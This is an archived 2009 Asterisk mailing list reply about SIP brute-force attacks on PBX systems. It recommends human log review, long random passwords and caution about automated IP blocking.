[asterisk-biz] PBX got Hacked

Trixter aka Bret McDanel trixter at 0xdecafbad.com
Tue Mar 10 02:48:41 CDT 2009


On Tue, 2009-03-10 at 05:40 +0000, Vikram Rangnekar wrote:
> The main reasons for all this brute force hacking of Asterisk (a new
> phenomenon) is the proliferation of Asterisk (obviously) and configurations
> where the extension is the same as the authentication credentials for the
> phones (My extension is 100 my pin is 1234 and I use this for my voicemail as
> well as for authenticating my phone with the server)
> 
> Ok well its possible your pin if 3214 even that does not really matter to a
> brute force attack over SIP where there is no real forced delay between retry
> attempts. 
> 

brute force attacks should generate logs of the failed attempts.  Those
logs should be read by a human who can take appropriate measures to deal
with it.  Automated responses such as blocking an IP are fine and all,
however there still has to be a human behind it all looking at those
logs.  Automated responses can be used to DoS the real person with
clever packets and spoofed IPs, they can also not be tripped because the
person did it slower and from more hosts and such making it just under
whatever threshold is coded into the automated response.

If you have a human reading the logs, the attacker has a much harder
time brute forcing the credentials and abusing a system.  Unless they
get packet captures and are trying to do a dictionary attack (slightly
different than a brute force, which is probably what you meant in the
first place) on the hashes that are contained in the auth packets.
Randomly chosen passwords make dictionary attacks impossible, the length
of the password can make brute force attacks unreasonable, and the
hashes should be sufficient that rainbow tables and reversing are
impossible/impractical (sip has this going for it at least).


-- 
Trixter http://www.0xdecafbad.com     Bret McDanel
pgp key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x8AE5C721

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.digium.com/pipermail/asterisk-biz/attachments/20090310/d5d3b573/attachment-0001.pgp 


More information about the asterisk-biz mailing list